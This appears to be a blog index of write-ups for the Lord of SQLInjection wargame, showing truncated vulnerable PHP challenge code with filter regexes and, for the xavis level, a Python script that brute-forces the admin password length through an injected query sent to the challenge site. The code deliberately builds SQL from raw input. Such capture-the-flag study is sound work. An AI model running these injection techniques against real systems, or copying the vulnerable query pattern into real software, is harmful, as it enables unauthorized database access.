Wargame(hacking)/LOS (26)

LORD OF SQLINJECTION : red_dragon Write-Up

LORD OF SQLINJECTION : green_dragon Write-Up

```php
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "query : {$query} ";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
  if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit(..
```

LORD OF SQLINJECTION : evil_wizard Write-Up

```php
if(preg_match('/prob|_|\.|proc|union|sleep|benchmark/i', $_GET[order])) exit("No Hack ~_~");
$query = "select id,email,score from prob_evil_wizard where 1 order by {$_GET[order]}"; // same with hell_fire? really?
echo "idemailscore";
$rows = mysqli_query($db,$query);
while(($result = mysqli_fetch_array($rows))){
  if($result['id'] == "admin") $result['email'] = "**************";
  echo "{$r..
```

LORD OF SQLINJECTION : hell_fire Write-Up

```php
if(preg_match('/prob|_|\.|proc|union/i', $_GET[order])) exit("No Hack ~_~");
$query = "select id,email,score from prob_hell_fire where 1 order by {$_GET[order]}";
echo "idemailscore";
$rows = mysqli_query($db,$query);
while(($result = mysqli_fetch_array($rows))){
  if($result['id'] == "admin") $result['email'] = "**************";
  echo "{$result[id]}{$result[email]}{$result[score]}";
}
ech..
```

LORD OF SQLINJECTION : dark_eyes Write-Up

```php
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(mysqli_error($db)) exit();
echo "query : {$query} ";
$_GET[pw] = addslashes($_GET[pw]);
$query = "sele..
```
LORD OF SQLINJECTION : iron_golem Write-Up

```php
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/sleep|benchmark/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(mysqli_error($db)) exit(mysqli_error($db));
echo "query : {$query} ";
$_GET[pw] = addslashes($_GET[pw]);
$query = "sel..
```

LORD OF SQLINJECTION : dragon Write-Up

```php
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_dragon where id='guest'# and pw='{$_GET[pw]}'";
echo "query : {$query} ";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "Hello {$result[id]}";
if($result['id'] == 'admin') solve("dragon");
```

해당 challenge에 해당하는 필터링 조건 및 pass 조건은 위와 같다. 눈에 띄는 점은 query에 #이 들어가 있..

LORD OF SQLINJECTION : xavis Write-Up

첫 번째 시도 (Fail)

```python
import requests
import string
url="https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or id='admin'%26%26length(pw)= "
cookies ={'PHPSESSID':"p0cct2pi257sma3qvmjcgbv5cb"}
for i in range(100):
    param=str(i)+"%23"
    URL = url+param
    print(URL)
    response = requests.get(URL, cookies=cookies)
    if "Hello admin" in response.text:
        print(i)
        break
```

id가 admin일 경우 p..